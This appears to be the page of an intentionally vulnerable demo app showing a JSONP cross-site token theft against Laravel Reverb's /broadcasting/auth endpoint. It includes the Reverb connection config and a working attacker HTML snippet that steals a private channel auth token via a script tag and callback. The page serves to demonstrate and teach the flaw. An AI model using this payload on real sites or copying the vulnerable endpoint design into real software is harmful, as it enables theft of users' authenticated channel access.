JSONP Broadcast Auth Demo

Logged in as Test User ([email protected])

Send Secret Message

Broadcasts an event on the private-secret-data channel.

Real-time Messages


Listening on private-secret-data via Laravel Echo.


Reverb Connection Config

These values are embedded in the built JavaScript and visible to anyone. Use them to configure the attacker page.

App Key: BZVy3zWTNpjbY6R5KhgJ
Host:    ws-a10d9dd8-8393-46e7-91a2-19ff7ff0642b-reverb.laravel.cloud
Port:    443
Scheme:  https

JSONP Vulnerability Details

The /broadcasting/auth endpoint supports JSONP via a callback query parameter. It also accepts GET requests and has CSRF disabled. This means an attacker-controlled page can use a <script> tag to steal your channel auth token: the browser attaches your session cookie to the script request, so the server signs the channel for your session, and the callback wrapper turns that JSON into executable JavaScript the attacker's page can read, bypassing the same-origin restriction that would block a plain cross-origin fetch.

Normal JSON response (POST without callback):

POST /broadcasting/auth
Content-Type: application/x-www-form-urlencoded

channel_name=private-secret-data&socket_id=123456.654321

Response: {"auth":"app_key:hmac_signature"}

JSONP response (GET with callback) — the vulnerability:

GET /broadcasting/auth?callback=steal&channel_name=private-secret-data&socket_id=123456.654321

Response: /**/ typeof steal === 'function' && steal({"auth":"app_key:hmac_signature"});

Attacker's HTML:

<script>function steal(data) { console.log('Stolen:', data.auth); }</script>
<script src="https://jsonp-reverb-victim.evilhacker.dev/broadcasting/auth?callback=steal&channel_name=private-secret-data&socket_id=123.456"></script>